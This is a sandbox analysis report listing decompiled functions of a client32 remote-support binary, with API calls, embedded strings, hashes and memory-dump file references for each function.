                                                                                                                                                    • Opcode Fuzzy Hash: ac985d5f38071a6d61f3d9ef1a3b635a51863d168853f4ed84212ab79fecb887
                                                                                                                                                    • Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1
                                                                                                                                                    Function 1102B920 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 220COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • GetLastError.KERNEL32(?), ref: 1102BA81
                                                                                                                                                    • GetLastError.KERNEL32(?), ref: 1102BADE
                                                                                                                                                    • _fgets.LIBCMT ref: 1102BB10
                                                                                                                                                    • _strtok.LIBCMT ref: 1102BB38
                                                                                                                                                      • Part of subcall function 11163ED6: __getptd.LIBCMT ref: 11163EF4
                                                                                                                                                    • _fgets.LIBCMT ref: 1102BB74
                                                                                                                                                    • _strtok.LIBCMT ref: 1102BB88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_fgets_strtok$ExitMessageProcess__getptdwsprintf
                                                                                                                                                    • String ID: *LookupFile$IsA()$LookupFileUser$WARN: Could not open TS lookup file: "%s" (%d), user="%s"$WARN: LoginUser failed (%d) user="%s"$WARN: No TS lookup file specified!$WARN: clientname is empty!$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                    • API String ID: 78526175-1484737611
                                                                                                                                                    • Opcode ID: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                                                                                    • Instruction ID: 5d6f4620134fd972b767ce717457c33aaf76edba5691a1b8f6aa8fc2ebdb03c0
                                                                                                                                                    • Opcode Fuzzy Hash: 832a1d2afe1d7addcbbc1c9479bfaaca6dd03d7c44e3f0c4f70082954299c4cb
                                                                                                                                                    • Instruction Fuzzy Hash: EA81F876D00A2D9BDB21DB94DC80FEEF7B8AF04309F4404D9D919A3244EA71AB84CF91
                                                                                                                                                    Function 1115B5D0 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                                      • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                                      • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                                                    • LoadLibraryA.KERNEL32(wlanapi.dll,?,?,?,?,11058627), ref: 1115B61B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 1115B634
                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 1115B644
                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 1115B654
                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 1115B664
                                                                                                                                                    • GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 1115B674
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1115B68D
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1115B6A2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                    • String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
                                                                                                                                                    • API String ID: 2439742961-1736626566
                                                                                                                                                    • Opcode ID: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                                                                                                    • Instruction ID: ed2c7270a583f493e0b466c25834e96d487c817f3cd2eef84f0062ec4251f30e
                                                                                                                                                    • Opcode Fuzzy Hash: b820fcb3f3504f3881004cd0bc95e177e444ea8b58218186fe09faae80a220e7
                                                                                                                                                    • Instruction Fuzzy Hash: 1721CEB9A013249FC350DFA9CC80A9AFBF8AF58204B14892EE42AD3605E771E400CB95
                                                                                                                                                    Function 11121300 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                                                                                      • Part of subcall function 1111F440: SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                                                                                      • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                                                                                      • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                                                                                      • Part of subcall function 1111F440: DeleteObject.GDI32(?), ref: 1111F516
                                                                                                                                                    • _free.LIBCMT ref: 1112131D
                                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                    • _free.LIBCMT ref: 11121333
                                                                                                                                                    • _free.LIBCMT ref: 11121348
                                                                                                                                                    • GdiFlush.GDI32(?,?,?,02E68E30), ref: 11121350
                                                                                                                                                    • _free.LIBCMT ref: 1112135D
                                                                                                                                                    • _free.LIBCMT ref: 11121371
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1112138D
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1112139A
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,02E68E30), ref: 111213A4
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 111213CB
                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 111213DE
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 111213EB
                                                                                                                                                    • InterlockedDecrement.KERNEL32(111EA9C8), ref: 111213F8
                                                                                                                                                    Strings
                                                                                                                                                    • Error deleting membm, e=%d, xrefs: 111213AB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
                                                                                                                                                    • String ID: Error deleting membm, e=%d
                                                                                                                                                    • API String ID: 3195047866-709490903
                                                                                                                                                    • Opcode ID: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                                                                                    • Instruction ID: f7d3d32e9876efa9dbc162a5d98189d6a342c9de11ba00d9e1d1e6b63679a2c9
                                                                                                                                                    • Opcode Fuzzy Hash: 856a3ecf5a1c88381e43c7b3755e2998f31a2ff9e92ea80af61142ad3529f9f4
                                                                                                                                                    • Instruction Fuzzy Hash: 892144B96107019BD214DFB5D9C8A9BF7E8FF98319F10491CE9AE83204EB35B501CB65
                                                                                                                                                    Function 110537C0 Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 360COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 11053A8A
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                      • Part of subcall function 11041F40: inet_ntoa.WSOCK32(?,?,?,?,110539A4,00000000,?,?,1EF76653,?,?), ref: 11041F52
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountErrorExitLastMessageProcessTickinet_ntoawsprintf
                                                                                                                                                    • String ID: %s:%u$Announce Error from %s. Invalid crc - ignoring$Announcement from %s [announcer-apptype: 0x%x] [target-apptype: 0x%x] [flags: 0x%08x]$IsA()$ListenPort$NSMWControl32$NSSWControl32$NSTWControl32$Port$TCPIP$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$port
                                                                                                                                                    • API String ID: 3701541597-1781216912
                                                                                                                                                    • Opcode ID: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                                                                                    • Instruction ID: 5c383da36f12d4855d2941ef62f3cc5b6d46123aa205a4bcc3d01b822d31dab0
                                                                                                                                                    • Opcode Fuzzy Hash: 011a09e4ebf555cb1d293c9696a7e6a42301eb6d37c4b5b12f9704b45b5c4a0d
                                                                                                                                                    • Instruction Fuzzy Hash: 3AD1A278E0461AABDF84DF94DC91FEEF7B5EF85308F044159E816AB245EB30A904CB61
                                                                                                                                                    Function 110CF130 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 239COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 110CF2FC
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 110CF3C3
                                                                                                                                                    • CreateWindowExA.USER32(00000000,Static,11195264,5000000E,?,?,00000010,00000010,?,00003A97,00000000,00000000), ref: 110CF400
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$ClientCreateItemLongObjectShowText
                                                                                                                                                    • String ID: ..\ctl32\nsmdlg.cpp$Static$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                                                                                    • API String ID: 4172769820-2231854162
                                                                                                                                                    • Opcode ID: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                                                                                                    • Instruction ID: 2d84ac58a4c57407e54c3cb5711102d4444eebaf719169cc73b89b5b27c55d8a
                                                                                                                                                    • Opcode Fuzzy Hash: c3b9e28978103be5a937d48a63f04c3ffe11da8c089b37b84e1aa512a40c65d6
                                                                                                                                                    • Instruction Fuzzy Hash: 8F81C375E00716ABD721CF64CC85F9EB3F4BB88B08F0045ADE5569B680EB74A940CF92
                                                                                                                                                    Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000017D,1EF76653,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                                                                                    • _memset.LIBCMT ref: 1110F4C2
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
                                                                                                                                                    • WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE
                                                                                                                                                      • Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
                                                                                                                                                    • _free.LIBCMT ref: 1110F628
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
                                                                                                                                                    • timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F677
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,1EF76653,0000017D,00000001), ref: 1110F681
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
                                                                                                                                                    • String ID: End Record %s$PCIR
                                                                                                                                                    • API String ID: 4278564793-2672865668
                                                                                                                                                    • Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                                                                    • Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
                                                                                                                                                    • Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
                                                                                                                                                    • Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91
                                                                                                                                                    Function 110F70E0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 176libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,1EF76653,1102E747,?,00000000), ref: 110F711B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7179
                                                                                                                                                    • wsprintfA.USER32 ref: 110F7235
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110F7242
                                                                                                                                                    • wsprintfA.USER32 ref: 110F7267
                                                                                                                                                    • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F72A7
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110F72BC
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 110F72D0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastLibraryProcwsprintf$FreeLoad
                                                                                                                                                    • String ID: %u.%u.%u.%u$%x:%x:%x:%x:%x:%x:%x:%x$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                                                                                    • API String ID: 856016564-3838485836
                                                                                                                                                    • Opcode ID: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                                                                                    • Instruction ID: 25a542e7ca9f20ccb9d734b321771151ba7e8120a74b68384c663ef2db5eebf1
                                                                                                                                                    • Opcode Fuzzy Hash: cc029828f1d21abf9f8ceca98a157caf4b608a284bbec4fbfb4073d9588458f4
                                                                                                                                                    • Instruction Fuzzy Hash: 2161B771D042689FDB18CFA98C98AADFFF5BF49301F0581AEF16A97251D6345904CF20
                                                                                                                                                    Function 11025000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                                                                                    • SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                                                                                    • SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                                                                                    • SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                                                                                    • SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                                                                                    • GetDC.USER32(?), ref: 11025085
                                                                                                                                                    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 110250A2
